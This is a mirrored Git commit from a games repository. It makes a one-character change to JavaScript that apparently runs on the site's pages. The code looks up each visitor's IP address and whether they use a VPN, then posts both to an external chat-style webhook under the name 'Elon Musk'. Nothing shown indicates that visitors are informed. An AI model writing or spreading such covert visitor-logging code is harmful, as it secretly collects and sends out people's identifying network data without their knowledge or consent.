mirror of
https://github.com/hexahigh/games.git
synced 2025-12-11 20:15:38 +01:00
e
This commit is contained in:
parent
3a4aa5802d
commit
f2a3932697
@ -31,7 +31,7 @@ $.getJSON("https://europe-central2-portfolio-website-374313.cloudfunctions.net/g
|
||||
var params = {
|
||||
username: "Elon Musk",
|
||||
avatar_url: "",
|
||||
content: "Did user use vpn?: " + usedvpn + "What is the ip?: " + userip
|
||||
content: "Did user use vpn?: " + usedvpn + " " +"What is the ip?: " + userip
|
||||
}
|
||||
|
||||
request.send(JSON.stringify(params));
|
||||
|
||||
Loading…
x
Reference in New Issue
Block a user